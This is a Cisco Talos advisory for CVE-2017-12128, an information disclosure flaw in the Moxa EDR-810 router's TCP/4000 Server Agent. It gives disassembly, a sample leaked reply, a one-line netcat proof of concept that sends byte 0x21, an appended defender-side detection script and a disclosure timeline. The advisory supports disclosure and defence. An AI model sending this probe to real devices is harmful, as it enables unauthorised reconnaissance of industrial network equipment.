CVE-2017-12128: TALOS-2017-0480 || Cisco Talos Intelligence Group
Summary
An exploitable information disclosure vulnerability exists in the Server Agent functionality of Moxa EDR-810 V4.1 build 17030317. A specially crafted TCP packet can cause information disclosure. An attacker can send a crafted TCP packet to trigger this vulnerability.
Tested Versions
Moxa EDR-810 V4.1 build 17030317
Product URLs
https://www.moxa.com/product/EDR-810.htm
CVSSv3 Score
5.3 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
CWE
CWE-213 - Intentional Information Exposure
Details
If the byte 0x21 is sent to the device over TCP/4000, the device replies with:
!..Model EDR-810-VPN-2GSFP
Name Firewall/VPN Router 05470
Serial No 1324
Firmware Ver. V3.13 build 16051215.
Location Device Location
--------------------------------------------------
LAN Address 192.168.127.254
Netmask 255.255.255.0
Gateway 0.0.0.0
MAC Address 00-90-E8-00-01-02
When the server receives 0x21 it calls the “DoShowInfo” function, which first gathers the system information and then sends it back to the client.
LDR R2, =aSS_0 ; "%s\t%s\n"
SUB R1, R11, #-s
SUB R3, R11, #-var_128
MOV R0, R1 ; s
MOV R1, R2 ; format
LDR R2, =aModel ; "Model"
BL sprintf
...
LDR R2, =aSS_0 ; "%s\t%s\n"
SUB R1, R11, #-s
SUB R3, R11, #-var_640
SUB R3, R3, #0xC
SUB R3, R3, #8
MOV R0, R1 ; s
MOV R1, R2 ; format
LDR R2, =aName ; "Name"
BL sprintf
...
LDR R2, =aSD_0 ; "%s\t%d\n"
SUB R3, R11, #-var_12
LDRB R1, [R3]
LDRB R3, [R3,#1]
ORR R3, R1, R3,LSL#8
SUB R1, R11, #-s
MOV R0, R1 ; s
MOV R1, R2 ; format
LDR R2, =aSerialNo ; "Serial No"
...
LDR R2, =aSSS ; "%s\t%s %s\n"
SUB R1, R11, #-s
SUB R3, R11, #-var_128
SUB R0, R11, #-var_170
STR R0, [SP,#0x9A4+var_9A4]
MOV R0, R1 ; s
MOV R1, R2 ; format
LDR R2, =aFirmwareVer_ ; "Firmware Ver."
...
LDR R2, =aSS_0 ; "%s\t%s\n"
SUB R1, R11, #-s
SUB R3, R11, #-var_640
SUB R3, R3, #0xC
SUB R3, R3, #8
ADD R3, R3, #0x29
MOV R0, R1 ; s
MOV R1, R2 ; format
LDR R2, =aLocation ; "Location"
...
BL Get_IF_IP_MASK
SUB R3, R11, #-var_970
SUB R3, R3, #0xC
SUB R3, R3, #4
SUB R2, R11, #-var_130
MOV R0, R3
MOV R1, R2
BL Get_IF_MAC
...
BL net_data_send
Exploit Proof-of-Concept
In order to trigger the information disclosure vulnerability, send 0x21 to the device over TCP/4000.
echo -ne '\x21' | nc 127.0.0.1 4000
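The following Python is an added, defender-side example and is not part of the Talos advisory: it flags the single-byte 0x21 probe to TCP/4000 described in the Details and proof-of-concept sections, and parses the tab-separated key/value reply DoShowInfo builds with its "%s\t%s\n" sprintf calls to inventory which fields a device disclosed. The sample reply is constructed from the output shown above; the two non-printable bytes after the echoed '!' and the segment/flow representation are assumptions.

```python
# Added example (not from the Talos advisory): detection helpers for the
# EDR-810 Server Agent 0x21 probe and the DoShowInfo reply it triggers.
from typing import Dict, List, Tuple
SERVER_AGENT_PORT = 4000    # Server Agent listens on TCP/4000
SHOW_INFO_OPCODE = b"\x21"  # single byte that makes the server call DoShowInfo
# keys worth alerting on among the "%s\t%s\n" pairs DoShowInfo builds with sprintf
SENSITIVE_KEYS = {"Model", "Serial No", "Firmware Ver.", "LAN Address",
                  "Netmask", "Gateway", "MAC Address"}
_JUNK = "!\ufffd" + "".join(map(chr, range(0x20)))  # echoed '!' + non-printables (assumed)
# Constructed reply, laid out the way the sprintf format strings produce it
SAMPLE_RESPONSE = (
    b"!\x00\x00Model\tEDR-810-VPN-2GSFP\n"
    b"Name\tFirewall/VPN Router 05470\n"
    b"Serial No\t1324\n"
    b"Firmware Ver.\tV3.13 build 16051215.\n"
    b"Location\tDevice Location\n"
    b"--------------------------------------------------\n"
    b"LAN Address\t192.168.127.254\n"
    b"Netmask\t255.255.255.0\n"
    b"Gateway\t0.0.0.0\n"
    b"MAC Address\t00-90-E8-00-01-02\n"
)
def is_show_info_probe(dst_port: int, payload: bytes) -> bool:
    """True for a client->device segment carrying only the 0x21 opcode
    (a trailing newline from an interactive tool such as nc is tolerated)."""
    return dst_port == SERVER_AGENT_PORT and payload.rstrip(b"\r\n") == SHOW_INFO_OPCODE

def parse_show_info_response(data: bytes) -> Dict[str, str]:
    """Split the reply into key/value pairs; tab-less lines (the dashes) are skipped."""
    fields: Dict[str, str] = {}
    for raw in data.decode("ascii", errors="replace").splitlines():
        line = raw.lstrip(_JUNK)
        if "\t" in line:
            key, value = line.split("\t", 1)
            fields[key.strip()] = value.strip()
    return fields

def scan_flow(segments: List[Tuple[str, int, bytes]]) -> List[str]:
    """Walk (direction, dst_port, payload) segments of one TCP flow and emit alerts."""
    alerts, probed = [], False
    for direction, dst_port, payload in segments:
        if direction == "c2s" and is_show_info_probe(dst_port, payload):
            probed = True
            alerts.append(f"DoShowInfo probe (0x21) to tcp/{dst_port}")
        elif direction == "s2c" and probed:   # only inspect replies to a seen probe
            leaked = sorted(k for k in parse_show_info_response(payload) if k in SENSITIVE_KEYS)
            if leaked:
                alerts.append("DoShowInfo reply disclosed: " + ", ".join(leaked))
    return alerts
```

Feeding the parsed reply into an asset inventory also gives a quick way to confirm which units still run the affected V4.1 build 17030317 firmware before the vendor's April 2018 update is applied.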
Timeline
2017-11-15 - Vendor Disclosure
2017-11-19 - Vendor Acknowledged
2017-12-25 - Vendor provided timeline for fix (Feb 2018)
2018-01-04 - Timeline pushed to mid-March per vendor
2018-03-24 - Talos followed up with vendor for release timeline
2018-03-26 - Timeline pushed to 4/13/18 per vendor
2018-04-12 - Vendor patched & published new firmware on website
2018-04-13 - Public Release
Discovered by Carlos Pacho of Cisco Talos.